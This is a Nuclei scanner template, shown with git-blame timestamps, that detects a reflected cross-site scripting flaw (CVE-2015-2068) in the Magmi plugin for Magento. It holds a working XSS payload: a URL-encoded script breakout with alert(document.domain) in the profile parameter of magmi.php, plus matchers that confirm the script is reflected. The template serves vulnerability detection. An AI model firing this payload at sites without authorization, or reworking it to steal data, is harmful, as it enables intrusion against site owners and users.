nuclei-templates/cves/2015/CVE-2015-2068.yaml

33 lines
1.0 KiB
YAML
Raw Normal View History

2021-10-11 12:05:38 +00:00
id: CVE-2015-2068
2021-10-11 11:28:08 +00:00
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
2021-12-09 17:58:33 +00:00
tags: cve,cve2015,magento,magmi,xss
2021-10-11 11:28:08 +00:00
requests:
- method: GET
path:
2021-10-11 12:02:29 +00:00
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-10-11 11:28:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-10-11 12:02:29 +00:00
- "</script><script>alert(document.domain)</script>"
2021-10-11 12:05:38 +00:00
2021-10-11 11:28:08 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200